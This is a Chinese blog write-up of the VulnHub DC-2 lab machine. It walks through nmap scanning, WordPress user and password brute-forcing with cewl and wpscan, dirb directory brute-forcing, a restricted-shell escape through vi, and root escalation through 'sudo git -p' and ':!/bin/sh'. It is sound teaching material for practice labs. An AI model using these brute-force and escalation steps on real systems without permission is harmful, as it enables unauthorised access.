vulnhub靶场 DC-2

目录

下载

开始

hosts文件进行修改

cewl抓取

使用wpscan进行用户爆破

dirb爆破网页目录

 ssh连接

 vi绕过

git提权

注:本文涉及到的一些知识都在下载后的dc-2.md文件中,文章不逐一讲解,或者私信

下载

链接:https://pan.baidu.com/s/1DJVYxhyoetIEAhyDtYikpg 
提取码:i53s

.ova文件导入,.md文件为涉及到的一些知识

开始

注意靶场网络配置与kali相同,启动靶机

查看kali的IP

使用nmap找到靶机ip,然后进行端口详细扫描

发现开启了80端口,还有一个可能将22端口改为7744的ssh服务,还发现网页进行了重定向

hosts文件进行修改

vi /etc/hosts        //修改hosts文件

 访问IP192.168.80.130,提示为wordpress的框架

提示使用cewl网页抓取,并说可能使用某个特定账户才能登录

cewl抓取

cewl http://dc-2 > pass.txt

使用wpscan进行用户爆破

wpscan --url http://dc-2 -e u

运行wpscan报错Could not find 'nokogiri' (~> 1.8.0) - 码农教程

解决报错问题

爆破出三个用户,将这些用户写入某个文件,当作下来爆破的用户字典 

wpscan --url -P passwdspath -U userspath

adipiscing        parturient

dirb爆破网页目录

dirb http://dc-2        找到后台用爆破的账号密码登录,发现用jerry用户即可


 

 找到flag2,提示换一种方式,想到之前的ssh

 ssh连接

tom登录,得到flag3

 

 看到rbash,了解一些命令被禁用

我们需要查看可用命令        ls /home/tom/usr/bin

 vi绕过

vi
:set shell=/bin/sh //给shell赋值
:shell //执行shell
逃逸成功后发现命令还是无法执行
我们查看PATH变量

发现,这是路径的问题,我们需要修改路径
export PATH=PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:sbin
然后就可以进行操作了

 flag3提示切换用户,我们切换为jerry

su jerry

再回到主目录,找到flag4,提示git提权 

git提权

 sudo -l         //授权查看,看到git

sudo git -p        //因为分页查看才能输入命令,所以将框距调小
:!/bin/sh         //shell转义,所以要避免sudo授权用户使用vi,vim,ftp.lee,more,git….
cd /root

ls

 

 

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值